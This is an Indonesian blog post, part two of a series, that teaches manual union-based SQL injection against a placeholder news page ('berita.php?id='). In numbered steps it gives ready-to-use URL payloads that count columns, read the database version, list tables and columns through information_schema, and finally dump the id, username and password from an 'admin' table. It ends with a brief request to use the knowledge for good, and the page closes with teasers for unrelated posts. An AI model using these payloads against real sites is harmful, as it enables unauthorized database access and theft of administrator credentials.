Langsung ke konten utama

Mengenal Lebih Dekat Dengan SQL Injection Part 2


TEKHNIK SQL INJECTION
Disini kita akan mengenal lebih dekat tekhnik SQL Injection pada sebuah sistem. Jika dalam sebuah website dimana ketika dimasukan special karakter seperti singgle quote (') mengalami error maka website tersebut dikatakan memiliki vulnerbilitas (vuln).
INJECTION SQL versi 5
Pada SQL versi ini value dapat di tampilkan melalui pemanggilan pada syntac SQL
Contoh :

==========
=step Satu:=
==========

[site]/berita.php?id=100’
 (ditambahkan single quote) mengalami error maka sistem tersebut dapat di explore
==========
=step Dua:=
==========

mencari dan menghitung jumlah table yang ada dalam databasenya...
gunakan perintah : order by

contoh:


[site]/berita.php?id=-100+order+by+1-- atau
[site]/berita.php?id=-100+order+by+1/*

ceklah secara step by step (satupersatu)...
contoh:


[site]/berita.php?id=-100+order+by+1--
[site]/berita.php?id=-100+order+by+2--
[site]/berita.php?id=-100+order+by+3--
[site]/berita.php?id=-100+order+by+4--

sehingga muncul error atau hilang pesan error...
contoh:
[site]/berita.php?id=-100+order+by+9--

berarti yang kita ambil adalah sampai angka 8
menjadi :
[site]/berita.php?id=-100+order+by+8--

===========
=step Tiga:=
===========

Untuk mengeluarkan angka berapa yang muncul gunakan perintah union
karena tadi error sampai angka 9
maka:
[site]/berita.php?id=-100+union+select+1,2,3,4,5,6,7,8--

Kita anggap yang keluar angka 5

gunakan perintah “version()” atau “@@version” untuk mengecek versi sql yg diapakai masukan perintah tsb pada nagka yg keluar tadi
misal:
[site]/berita.php?id=-100+union+select+1,2,3,4,version(),6,7,8-- atau
[site]/berita.php?id=-100+union+select+1,2,3,4,@@version,6,7,8--

lihat versi yg digunakan seumpama versi 4 tinggalkan saja karena dalam ver 4 ini kita harus menebak sendiri table n column yg ada pada web tersebut karena tidak bisa menggunakan perintah From+Information_schema..

untuk versi 5 berarti anda beruntung tak perlu menebak table n column seperti ver 4 karena di ver 5 ini bisa menggunakan perintah From+Information_schema..


============
=step Empat:=
============

Untuk menampilkan table yg ada pada web tsb adalah
perintah table_name >>> dimasukan pada angka yg keluar tadi perintah +from+information_schema.tables-- >>> dimasukan setelah angka terakhir



Code:

[site]/berita.php?id=-100+union+select+1,2,3,4,table_name,6,7,8+from+information_schema.tables--

Kita anggap table yang muncul adalah "admin"


===========
=step Lima:=
===========

Untuk menampilkan semua isi dari table tsb adalah
perintah group_concat(table_name) >>> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.tables+where+table_schema=database()-- >>> dimasukan setelah angka terakhir



[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(table_name),6,7,8+from+information_schema.tables+where+table_schema=database()--

=============
= step Enam: =
=============

Perintah group_concat(column_name) >>> dimasukan pada angka yang sebelumnya
perintah +from+information_schema.columns+where+table_name=0xhexa-- >>> dimasukan setelah angka terakhir



[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(column_name),6,7,8+from+information_schema .columns+where+table_name=0xhexa--

Pada tahap ini kamu wajib mengextrak kata pada isi table menjadi hexadecimal yaitu dengan cara mengkonversinya
website yg digunakan untuk konversi :

http://www.v3n0m.net/ascii.htm
Banyak juga tools yang dapat mengkonversi bilangan hexa ini. Contoh : hexeditor, hex calculator, dll

Contoh kata yg ingin di konversi yaitu admin maka akan menjadi 61646D696E



[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(column_name),6,7,8+from+information_schema .columns+where+table_name=0x61646D696E--

============
=step Tujuh:=
============

Memunculkan apa yg tadi telah dikeluarkan dari table yaitu dengan cara

Perintah concat_ws(0x3a,hasil isi column yg mau dikeluarkan) >>> dimasukan pada angka yg keluar tadi
perintah +from+(nama table berasal) >>> dimasukan setelah angka terakhir

Contoh :

[site]/berita.php?id=-100+union+select+1,2,3,4,concat_ws(0x3a,hasil isi column),6,7,8+from+(nama table berasal)--

contoh kata yang keluar adalah id,username,password

Contoh :

[site]/berita.php?id=-100+union+select+1,2,3,4,concat_ws(0x3a,id,username,password),6,7,8+from+admin--

Sampai disini kita sudah mendapatkan isi dari database yang kita inginkan.

 inget  ini untuk versi 5, untuk versi 4 berbeda metode, 

Gunakan ilmu yang di peroleh unuk kebaikan jangan buat ngisengin orang lain yah ^_^


Komentar

Posting Komentar

Postingan populer dari blog ini

Contoh Rewrite Rule

melanjutkan post yang sebelumnya mengenai penyerderhanaan  link di website Sedikit aja Nih Gan Silakan di simak... RewriteEngine on RewriteRule ^home$ media.php?module=home [L] RewriteRule ^galeri-(.*)\.html$ zoom.php?id=$1 [L] RewriteRule ^album-(.*)\.html$ media.php?module=detailalbum&id=$1 [L] RewriteRule ^berita-(.*)\.html$ media.php?module=detailberita&id=$1 [L] RewriteRule ^agenda-(.*)\.html$ media.php?module=detailagenda&id=$1 [L] RewriteRule ^hasil-pencarian\.html$ media.php?module=hasilcari&id=$1 [L] RewriteRule ^indeks-berita\.html$ media.php?module=indeksberita&id=$1 [L] RewriteRule ^hasil-poling\.html$ media.php?module=hasilpoling&id=$1 [L] RewriteRule ^lihat-poling\.html$ media.php?module=lihatpoling&id=$1 [L] RewriteRule ^profil-kami\.html$ media.php?module=profilkami&id=$1 [L] RewriteRule ^tentang\.html$ media.php?module=tentang&id=$28 [L] RewriteRule ^hubungi-kami\.html$ media.php?module=hubungikami&id=$1 [L] R...
Posting Komentar
Baca selengkapnya

Mengenal Karakteristik Dan Siklus Hidup worm , virus, trojan horse, ataupun malcode lainnya

pada umumnya worm memiliki kemampuan dasar sebagai berikut : 1.        KEMAMPUAN REPRODUKSI DAN DISTRIBUSI Yaitu kemampuan yang mutlak dimiliki oleh worm untuk membuat salinan dirinya sendiri, sekaligus mendistribusikan salinan tersebut pada system yang lain baik   melalui media penyimpanan   seperti flasdisk, disket dll, maupun melalui jaringan komputer, walau pun memiliki rutin untuk menginfeksi program lain namun tidak bertujuan menjadikan file program terinfeksi sebagi file infektor. Pada awalnya wor dibuat dengan aksi memnuhi hardisk dan jaringan, namun seiringnya perkembangan jaman   dan teknologi informasi hal ini di tinggalkan oleh para worm writter   karena malah akan mengurangi kemampuan worm itu sendiri dalam menyembunyikan dirinya sendiri, yang akan berakibat worm tersebut cepat terendus oleh advance user ataupun oleh para vendor pembuat anti virus. 1.        KEMAMPUAN REKAYASA SOSIAL K...
5 komentar
Baca selengkapnya

Kupas Tuntas Penomoran Otomatis di Access 2007

Oke kawan sedit lagi nih tambahan mudah-mudah gak boring hehehehehe oke langsung aja liat di bawah untuk pembahasanya: pada dasarnya penomoran otomatis memilik beberapa fungsi sebagai berikut : 1. Menghindari Penyalahgunaan Dokumen 2. Menghindari Penomoran Dokumen yang ganda 3. Memudahkan dalam control penggunaan dokumen 4. Memudahkan dalam penulusuran (trace) ketika terjadi dokumen yang hilang. 5. Pengunaan Nomer terurut merupakan salah satu ciri dari dokumen yang baik yang bisa di gunakan    untuk bahan pemeriksaan ( auditing) Nah berikut ini VBA code beserta penjelasanya... saya berikan 2 contoh format penomeran otomatis dan VBA selamat anda tau konsep penomoran otomatisnya sebenernya kaliat akan dengan mudahnya membuat penomoran otomatis dengan format penomoran yang di perlukan Untuk penomoran otomatis berurutan P-0001, P-0002, P-0003, berikut ini VBAnya : Private Sub cmdbaru_Click() On Error GoTo cmdbaru_Click_Err Dim no     DoC...
2 komentar
Baca selengkapnya